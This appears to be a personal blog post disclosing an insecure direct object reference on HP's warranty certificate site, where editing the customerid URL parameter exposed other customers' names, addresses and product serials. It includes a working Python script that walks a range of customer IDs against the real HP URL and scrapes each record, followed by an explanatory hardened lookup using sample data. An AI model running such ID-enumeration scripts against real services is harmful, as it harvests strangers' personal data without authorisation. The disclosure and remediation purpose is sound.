Hi all! I am writing a blog post after a really long time. Sorry!
The Hewlett-Packard Company is an American global information technology company headquartered in Palo Alto, California, United States.
A few months back I purchased an HP laptop. After purchasing it I had to register myself for warranty extensions and so on, and that process was online. After I completed the process they sent me an email saying that my order had been registered, and asking me to download a certificate for it.
https://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:#USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid=30394780&provider=1
Now when I looked at the URL, the parameter customerid looked interesting. Let's change that and check what happens. Voilà!
Name
Address
Product Serial No.
Product Number
Product Description
HP Care Pack Serial Number
Bad, right?
Since the ID I got was somewhere around 30394780 … I guess too much data is getting exposed.
I wrote a simple Python script for it:
import re
import urllib2,sys
from bs4 import BeautifulSoup

id = 30394790
while (id < 30394850):
    # Request the certificate page with the current value of customerid
    html = urllib2.urlopen("http://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:%23USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid={id}&provider=1".format(id=id)).read()
    soup = BeautifulSoup(html)
    text = soup.get_text()
    text2 = text.replace("\n", "")
    text2 = text2.replace(" ", "\n")
    text2 = text2.replace("\n", "") #meh was just trying to remove garbage whitespaces
    # Print the label before incrementing so it matches the ID that was requested
    print "DATA OF " + str(id) + "\n \n"
    print text2
    id = id + 1
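The root cause is that the page returns whichever record customerid names, with no check that the requester is entitled to it. The sketch below is an added example, not code from this post or from HP: it puts that behaviour beside a hardened lookup that only honours links carrying a server-signed token. The records, key, the `token` parameter and all function names are hypothetical.

```python
import hashlib
import hmac

# Constructed sample data: key, IDs and records are hypothetical.
SECRET_KEY = b"constructed-demo-key"
CERTIFICATES = {
    "1001": {"salesordernumber": "SO-AAA", "name": "Customer A", "serial": "SERIAL-A"},
    "1002": {"salesordernumber": "SO-BBB", "name": "Customer B", "serial": "SERIAL-B"},
}

def sign_link(customerid, salesordernumber):
    """Token placed in the e-mailed link; binds both identifiers together."""
    msg = "{}|{}".format(customerid, salesordernumber).encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()

def get_certificate_vulnerable(params):
    """Behaviour described in the post: customerid alone selects the record."""
    return CERTIFICATES.get(params.get("customerid"))

def get_certificate_hardened(params):
    """Return a record only for an untampered link to the customer's own order."""
    cid = params.get("customerid", "")
    order = params.get("salesordernumber", "")
    token = params.get("token", "")
    expected = sign_link(cid, order)
    # Constant-time comparison on bytes; any edited parameter changes the MAC.
    if not hmac.compare_digest(expected.encode(), token.encode()):
        return None
    record = CERTIFICATES.get(cid)
    # Defence in depth: the order in the link must belong to that customer.
    if record is None or record["salesordernumber"] != order:
        return None
    return record

def demo():
    """Compare both handlers on the e-mailed link and on an edited copy of it."""
    link = {"customerid": "1001", "salesordernumber": "SO-AAA"}
    link["token"] = sign_link("1001", "SO-AAA")
    tampered = dict(link, customerid="1002")  # only customerid changed
    return {
        "vulnerable_tampered": get_certificate_vulnerable(tampered),
        "hardened_own": get_certificate_hardened(link),
        "hardened_tampered": get_certificate_hardened(tampered),
    }

if __name__ == "__main__":
    for case, result in demo().items():
        print(case, "->", result)
```

Where the site has logins, the stronger fix is to take the customer ID from the authenticated session rather than from the URL at all.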
Conclusion: everything is going online, and big companies have yet to realize that their customers' data is at risk. Publishing worldwide reports on cyber security while failing to protect their own customers' data is an irony.
And why is leaking these serial numbers and product IDs bad? Read this story of how a pro social engineer ripped off many big companies; one of his methods included cracking the serial number pattern of a product.
http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13930/social-engineering-scripts/